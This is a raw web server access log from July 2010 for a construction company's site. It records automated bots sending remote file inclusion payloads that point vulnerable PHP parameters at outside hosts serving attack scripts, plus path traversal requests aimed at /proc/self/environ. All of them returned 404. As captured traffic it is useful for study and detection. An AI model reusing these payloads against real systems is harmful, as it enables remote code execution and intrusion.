94.102.9.224 - - [02/Jul/2010:00:19:09 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
94.102.9.224 - - [02/Jul/2010:00:19:09 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
94.102.9.224 - - [02/Jul/2010:00:19:10 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
94.102.9.224 - - [02/Jul/2010:00:19:11 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
94.102.9.224 - - [02/Jul/2010:00:19:11 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
94.102.9.224 - - [02/Jul/2010:00:19:11 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
217.73.239.6 - - [02/Jul/2010:00:19:15 -0700] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.807" "www.de-construction.com"
217.73.239.6 - - [02/Jul/2010:00:19:16 -0700] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.807" "www.de-construction.com"
217.73.239.6 - - [02/Jul/2010:00:20:02 -0700] "GET /logs/access_100531.log/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.807" "www.de-construction.com"
217.73.239.6 - - [02/Jul/2010:00:20:03 -0700] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.807" "www.de-construction.com"
217.73.239.6 - - [02/Jul/2010:00:20:03 -0700] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.807" "www.de-construction.com"
217.73.239.6 - - [02/Jul/2010:00:20:16 -0700] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.807" "www.de-construction.com"
217.73.239.6 - - [02/Jul/2010:00:20:16 -0700] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.807" "www.de-construction.com"
217.73.239.6 - - [02/Jul/2010:00:21:09 -0700] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.807" "www.de-construction.com"
217.73.239.6 - - [02/Jul/2010:00:21:09 -0700] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.807" "www.de-construction.com"
109.71.41.45 - - [02/Jul/2010:00:21:14 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.de-construction.com"
109.71.41.45 - - [02/Jul/2010:00:21:15 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.de-construction.com"
89.200.170.145 - - [02/Jul/2010:00:21:53 -0700] "GET /logs/access_100601.log//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.de-construction.com"
89.200.170.145 - - [02/Jul/2010:00:21:53 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.de-construction.com"
89.200.170.145 - - [02/Jul/2010:00:21:53 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.de-construction.com"
121.254.172.27 - - [02/Jul/2010:00:21:57 -0700] "GET /logs/access.log/errors.php?error=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
121.254.172.27 - - [02/Jul/2010:00:21:57 -0700] "GET /logs/errors.php?error=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
121.254.172.27 - - [02/Jul/2010:00:21:57 -0700] "GET /errors.php?error=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
83.125.73.96 - - [02/Jul/2010:00:22:09 -0700] "GET /logs/access_100601.log//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
83.125.73.96 - - [02/Jul/2010:00:22:09 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
83.125.73.96 - - [02/Jul/2010:00:22:10 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
109.71.41.45 - - [02/Jul/2010:00:22:12 -0700] "GET /logs/access_100601.log//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.de-construction.com"
109.71.41.45 - - [02/Jul/2010:00:22:13 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.de-construction.com"
109.71.41.45 - - [02/Jul/2010:00:22:13 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.de-construction.com"
89.200.170.145 - - [02/Jul/2010:00:22:34 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.de-construction.com"
89.200.170.145 - - [02/Jul/2010:00:22:34 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.de-construction.com"
217.73.239.6 - - [02/Jul/2010:00:22:42 -0700] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.807" "www.de-construction.com"
217.73.239.6 - - [02/Jul/2010:00:22:43 -0700] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.807" "www.de-construction.com"
83.125.73.96 - - [02/Jul/2010:00:22:45 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
83.125.73.96 - - [02/Jul/2010:00:22:45 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
94.102.9.224 - - [02/Jul/2010:00:23:08 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
94.102.9.224 - - [02/Jul/2010:00:23:08 -0700] "GET /logs/access_100501.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
94.102.9.224 - - [02/Jul/2010:00:23:08 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
94.102.9.224 - - [02/Jul/2010:00:23:09 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
94.102.9.224 - - [02/Jul/2010:00:23:09 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
94.102.9.224 - - [02/Jul/2010:00:23:09 -0700] "GET /logs/access_100501.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
94.102.9.224 - - [02/Jul/2010:00:23:09 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
94.102.9.224 - - [02/Jul/2010:00:23:09 -0700] "GET /logs/access_100501.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
94.102.9.224 - - [02/Jul/2010:00:23:09 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
94.102.9.224 - - [02/Jul/2010:00:23:12 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
94.102.9.224 - - [02/Jul/2010:00:23:12 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
94.102.9.224 - - [02/Jul/2010:00:23:12 -0700] "GET /logs/access_100501.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
89.200.170.145 - - [02/Jul/2010:00:23:25 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.de-construction.com"
83.125.73.96 - - [02/Jul/2010:00:23:50 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
109.71.41.45 - - [02/Jul/2010:00:23:50 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.de-construction.com"
89.200.170.145 - - [02/Jul/2010:00:23:56 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.de-construction.com"
83.125.73.96 - - [02/Jul/2010:00:24:10 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
89.200.170.145 - - [02/Jul/2010:00:24:25 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.de-construction.com"
83.125.73.96 - - [02/Jul/2010:00:24:31 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
109.71.41.45 - - [02/Jul/2010:00:24:40 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.de-construction.com"
67.205.67.73 - - [02/Jul/2010:00:25:05 -0700] "GET /logs//bbs/include/print_category.php?setup[use_category]=1&dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
67.205.67.73 - - [02/Jul/2010:00:25:05 -0700] "GET /bbs/include/print_category.php?setup[use_category]=1&dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
67.205.67.73 - - [02/Jul/2010:00:25:05 -0700] "GET /logs/access_100501.log//bbs/include/print_category.php?setup[use_category]=1&dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
83.125.73.96 - - [02/Jul/2010:00:25:05 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
83.125.73.96 - - [02/Jul/2010:00:25:06 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
109.71.41.45 - - [02/Jul/2010:00:25:46 -0700] "GET /logs/access_100601.log//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.de-construction.com"
109.71.41.45 - - [02/Jul/2010:00:25:47 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.de-construction.com"
83.125.73.96 - - [02/Jul/2010:00:25:47 -0700] "GET /logs/access_100601.log//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
109.71.41.45 - - [02/Jul/2010:00:25:47 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.de-construction.com"
83.125.73.96 - - [02/Jul/2010:00:25:47 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
83.125.73.96 - - [02/Jul/2010:00:25:48 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
74.52.48.66 - - [02/Jul/2010:00:25:55 -0700] "GET /logs/access_100501.log//bbs/include/print_category.php?setup[use_category]=1&dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
74.52.48.66 - - [02/Jul/2010:00:25:55 -0700] "GET /logs//bbs/include/print_category.php?setup[use_category]=1&dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
74.52.48.66 - - [02/Jul/2010:00:25:55 -0700] "GET /bbs/include/print_category.php?setup[use_category]=1&dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
74.52.48.66 - - [02/Jul/2010:00:26:12 -0700] "GET /logs//bbs/include/print_category.php?setup[use_category]=1&dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
74.52.48.66 - - [02/Jul/2010:00:26:12 -0700] "GET /bbs/include/print_category.php?setup[use_category]=1&dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
74.52.48.66 - - [02/Jul/2010:00:26:12 -0700] "GET /logs/access_100501.log//bbs/include/print_category.php?setup[use_category]=1&dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
67.205.67.73 - - [02/Jul/2010:00:26:22 -0700] "GET /bbs/include/print_category.php?setup[use_category]=1&dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
67.205.67.73 - - [02/Jul/2010:00:26:22 -0700] "GET /logs//bbs/include/print_category.php?setup[use_category]=1&dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
67.205.67.73 - - [02/Jul/2010:00:26:22 -0700] "GET /logs/access_100501.log//bbs/include/print_category.php?setup[use_category]=1&dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
109.71.41.45 - - [02/Jul/2010:00:26:26 -0700] "GET /logs/access_100601.log//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.de-construction.com"
109.71.41.45 - - [02/Jul/2010:00:26:27 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.de-construction.com"
109.71.41.45 - - [02/Jul/2010:00:26:27 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.de-construction.com"
94.102.9.224 - - [02/Jul/2010:00:28:33 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
94.102.9.224 - - [02/Jul/2010:00:28:33 -0700] "GET /logs/access_100601.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
94.102.9.224 - - [02/Jul/2010:00:28:33 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
83.16.100.218 - - [02/Jul/2010:00:28:51 -0700] "GET /logs/access_100501.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.amde.org.br/joomla/images/stories/fruit/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
83.16.100.218 - - [02/Jul/2010:00:28:51 -0700] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.amde.org.br/joomla/images/stories/fruit/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
83.16.100.218 - - [02/Jul/2010:00:28:51 -0700] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.amde.org.br/joomla/images/stories/fruit/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
94.102.9.224 - - [02/Jul/2010:00:28:52 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
94.102.9.224 - - [02/Jul/2010:00:28:52 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
94.102.9.224 - - [02/Jul/2010:00:28:52 -0700] "GET /logs/access_100601.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
121.254.172.27 - - [02/Jul/2010:00:29:14 -0700] "GET /logs/access_100531.log/errors.php?error=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
83.16.100.218 - - [02/Jul/2010:00:30:27 -0700] "GET /logs/access_100531.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.amde.org.br/joomla/images/stories/fruit/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
89.200.170.145 - - [02/Jul/2010:00:30:41 -0700] "GET /logs/access.log//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.de-construction.com"
89.200.170.145 - - [02/Jul/2010:00:30:41 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.de-construction.com"
89.200.170.145 - - [02/Jul/2010:00:30:42 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.de-construction.com"
91.121.67.226 - - [02/Jul/2010:00:32:45 -0700] "GET /index.php?option=com_remository&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.de-construction.com"
83.125.73.96 - - [02/Jul/2010:00:33:13 -0700] "GET /logs/access.log//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
83.125.73.96 - - [02/Jul/2010:00:33:14 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
83.125.73.96 - - [02/Jul/2010:00:33:14 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
83.16.100.218 - - [02/Jul/2010:00:35:41 -0700] "GET /logs/access.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.amde.org.br/joomla/images/stories/fruit/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
89.200.170.145 - - [02/Jul/2010:00:38:00 -0700] "GET /logs/access_100331.log//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.de-construction.com"
89.200.170.145 - - [02/Jul/2010:00:38:00 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.de-construction.com"
89.200.170.145 - - [02/Jul/2010:00:38:01 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.de-construction.com"
109.71.41.45 - - [02/Jul/2010:00:41:58 -0700] "GET /logs/access_100331.log//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.de-construction.com"
109.71.41.45 - - [02/Jul/2010:00:41:58 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.de-construction.com"
109.71.41.45 - - [02/Jul/2010:00:41:58 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.de-construction.com"
83.125.73.96 - - [02/Jul/2010:00:46:06 -0700] "GET /logs/access_100331.log//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
83.125.73.96 - - [02/Jul/2010:00:46:06 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
83.125.73.96 - - [02/Jul/2010:00:46:06 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
110.45.140.231 - - [02/Jul/2010:00:47:50 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://wkmg.co.kr/bbs/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
110.45.140.231 - - [02/Jul/2010:00:47:50 -0700] "GET /logs/access.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://wkmg.co.kr/bbs/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
110.45.140.231 - - [02/Jul/2010:00:47:50 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://wkmg.co.kr/bbs/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
114.200.199.236 - - [02/Jul/2010:00:48:45 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://kanalkultur.com/de/language/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
114.200.199.236 - - [02/Jul/2010:00:48:45 -0700] "GET /logs/access_100531.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://kanalkultur.com/de/language/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
114.200.199.236 - - [02/Jul/2010:00:48:47 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://kanalkultur.com/de/language/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
61.135.134.108 - - [02/Jul/2010:00:48:48 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://kanalkultur.com/de/language/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
61.135.134.108 - - [02/Jul/2010:00:48:48 -0700] "GET /logs/access_100531.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://kanalkultur.com/de/language/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
61.135.134.108 - - [02/Jul/2010:00:48:49 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://kanalkultur.com/de/language/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
61.135.134.108 - - [02/Jul/2010:00:49:09 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://kanalkultur.com/de/language/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
61.135.134.108 - - [02/Jul/2010:00:49:09 -0700] "GET /logs/access_100531.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://kanalkultur.com/de/language/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
61.135.134.108 - - [02/Jul/2010:00:49:10 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://kanalkultur.com/de/language/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
114.200.199.236 - - [02/Jul/2010:00:49:12 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://kanalkultur.com/de/language/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
114.200.199.236 - - [02/Jul/2010:00:49:12 -0700] "GET /logs/access_100531.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://kanalkultur.com/de/language/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
114.200.199.236 - - [02/Jul/2010:00:49:12 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://kanalkultur.com/de/language/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
66.191.139.210 - - [02/Jul/2010:00:49:30 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
66.191.139.210 - - [02/Jul/2010:00:49:30 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
